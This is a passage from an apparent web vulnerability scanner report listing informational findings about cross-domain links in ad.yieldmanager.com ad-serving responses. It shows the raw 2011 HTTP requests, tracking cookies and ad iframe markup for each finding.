<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0117.2rm.ac4
Set-Cookie: ih="b!!!!'!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; path=/; expires=Wed, 10-Apr-2013 16:41:19 GMT
Set-Cookie: vuday1=d-=>R!4)FWjt)Q>; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:41:19 GMT
Pragma: no-cache
Content-Length: 4439
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(4801930);}
</script><SCRIPT LANGUAGE
...[SNIP]...
</SCRIPT>
<script src="http://ads.yimg.com/a/a/1-/jscodes/flash8/lrec_20081114.js"></script>
<noscript><a href="http://ads.bluelithium.com/clk?2,13%3Be6193c7cbe9541b8%3B12f45705349,0%3B%3B%3B1097085673,wT8nBQNzEgCKRUkAAAAAAAoODwAAAAAAAgAAAAIAAAAAAP8AAAACDMxcHgAAAAAAFCMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAASFNwRS8BAAAAAAAAADg2MzMwNjA0LTY0NWEtMTFlMC1iZjNjLTAwMzA0OGQ2ZDhhYQA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302540075598%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,http://howlifeworks.com/popular/?cid=8088zy3" target="_blank">
<img src="http://content.yieldmanager.edgesuite.net/atoms/3f/f8/2a/67/3ff82a670d7106f40429e45af68c5d5a.gif" width="300" height="250" border="0"></a>
...[SNIP]...
10.108. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302543676320&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#d!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pS!!!!#<uwIu!#3pv!!!!$<uwIu!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(V!!!!#<uwIu!#5(X!!!!#<uw3o!#5(Y!!!!#<uwIu!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#5(f!!!!#<uwIu!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<e!!!!#<uwIu!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<i!!!!#<uwIu!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LE!!!!#<uwBu!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; liday1=fh'jT9<=sn$o@U=!4)FW>/M!D; ih="b!!!!,!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!/d<p!!!!#<uwg6!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-_j!!!!#<uw`0!1-ar!!!!#<uwX+!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ"; vuday1=d-=>Rd-=>R!4)FWKw-DF; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:41:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0121.2rm.ac4
Set-Cookie: ih="b!!!!-!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!/d<p!!!!#<uwg6!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-_j!!!!#<uw`0!1-ar!!!!#<uwX+!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ!1bC]!!!!#<uwn<"; path=/; expires=Wed, 10-Apr-2013 17:41:19 GMT
Set-Cookie: vuday1=d-=>Rd-=>R!4)FWKw-DF; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=fh'jTD^$u19<=sn$o@U=!4)FWk`zw_; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 17:41:19 GMT
Pragma: no-cache
Content-Length: 1109
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9041166);}
</script><!--Vendor: Congoo dba Adblade, Format: IFrame -->
<iframe style="overflow: hidden;" frameborder="0" scrolling="no" hspace="0" vspace="0" marginheight="0" marginwidth="0" width="300" height="250" src="http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3Bb6b94bd09ef336c5%3B12f45a73f93,0%3B%3B%3B667831228,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAkj-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,"></iframe>
...[SNIP]...
10.109. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?wT8nBQNzEgBmbXcAAAAAAGN3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAICgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAA..-f4IDl0z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2uLCzZx.sCZXKcVdeVTh.w6u6YZlhNxHyDoFuAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543075644%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D3133754635%26B%3D10%26r%3D0,827bc06c-6461-11e0-b28b-003048d6d216 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302543075644&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#d!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pS!!!!#<uwIu!#3pv!!!!$<uwIu!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(V!!!!#<uwIu!#5(X!!!!#<uw3o!#5(Y!!!!#<uwIu!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#5(f!!!!#<uwIu!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<e!!!!#<uwIu!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<i!!!!#<uwIu!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LE!!!!#<uwBu!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; ih="b!!!!+!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-_j!!!!#<uw`0!1-ar!!!!#<uwX+!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ"; vuday1=d-=>Rd-=>R!4)FWKw-DF; liday1=fh'jT9<=sn$o@U=!4)FW>/M!D; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:31:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0118.2rm.ac4
Set-Cookie: ih="b!!!!,!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!/d<p!!!!#<uwg6!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-_j!!!!#<uw`0!1-ar!!!!#<uwX+!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ"; path=/; expires=Wed, 10-Apr-2013 17:31:19 GMT
Set-Cookie: vuday1=d-=>Rd-=>R!4)FWKw-DF; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 17:31:19 GMT
Pragma: no-cache
Content-Length: 4288
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(7826790);}
</script><SCRIPT LANGUAGE
...[SNIP]...
</SCRIPT>
<script src="http://ads.yimg.com/a/a/1-/jscodes/flash8/lrec_20081114.js"></script>
<noscript><a href="http://ads.bluelithium.com/clk?2,13%3B8557054421da0ea8%3B12f459e1884,0%3B%3B%3B1563303912,wT8nBQNzEgBmbXcAAAAAAGN3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAICgoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAhBieRS8BAAAAAAAAADgyN2JjMDZjLTY0NjEtMTFlMC1iMjhiLTAwMzA0OGQ2ZDIxNgBmlSoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543075644%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html," target="_blank">
<img src="http://ads.yimg.com/a/a/fi/teja/300x250_sample3_v2.gif" width="300" height="250" border="0"></a>
...[SNIP]...
10.110. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pixel?&id=1156121&id=956405&id=1094107&id=1127720&id=939987&id=950991&id=1049055&id=939942&id=1048473&id=1212819&id=1250690&id=1224511&id=1239839&id=1198835&id=1080693&id=940005&id=1216952&id=612033&id=698998&id=1023063&id=915172&id=294012&id=1212821&id=940004&id=1028574&id=1085597&id=992290&id=956404&id=1081668&id=1198834&id=502881&id=1253950&id=1210932&id=940026&id=1212735&id=1095717&id=1050626&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!$!/cM[!!!!#<uB1*!0Qau!!!!#<tePk"; pv1="b!!!!$!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~"; bh="b!!!!r!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#aH+!!!!#<u]Bd!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#xu[!!!!#<u]Bd!$#r<!!!!#<td)R!$'(]!!!!#<u]Bd"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:45 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
